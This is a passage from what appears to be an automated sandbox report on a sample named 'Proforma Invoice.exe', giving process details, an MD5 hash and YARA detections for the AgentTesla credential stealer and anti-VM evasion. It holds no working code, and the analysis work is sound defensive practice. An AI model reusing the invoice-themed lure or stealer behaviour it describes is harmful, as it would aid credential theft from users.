                                                                                   • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                   • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                   • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                   Reputation: low

                                                                                  General

                                                                                   Start time: 05:19:14
                                                                                   Start date: 14/10/2021
                                                                                   Path: C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                   Wow64 process (32bit): false
                                                                                   Commandline: C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                   Imagebase: 0x2e0000
                                                                                   File size: 368128 bytes
                                                                                   MD5 hash: DD00DDE252A92512815C0D0D3679D1FD
                                                                                   Has elevated privileges: true
                                                                                   Has administrator privileges: true
                                                                                   Programmed in: C, C++ or other language
                                                                                   Reputation: low

                                                                                  General

                                                                                   Start time: 05:19:15
                                                                                   Start date: 14/10/2021
                                                                                   Path: C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                   Wow64 process (32bit): true
                                                                                   Commandline: C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                   Imagebase: 0xb20000
                                                                                   File size: 368128 bytes
                                                                                   MD5 hash: DD00DDE252A92512815C0D0D3679D1FD
                                                                                   Has elevated privileges: true
                                                                                   Has administrator privileges: true
                                                                                   Programmed in: .Net C# or VB.NET
                                                                                   Yara matches:
                                                                                   • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.560307423.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                   • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.560307423.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                   • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp, Author: Joe Security
                                                                                   • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp, Author: Joe Security
                                                                                   Reputation: low

                                                                                  Disassembly

                                                                                  Code Analysis
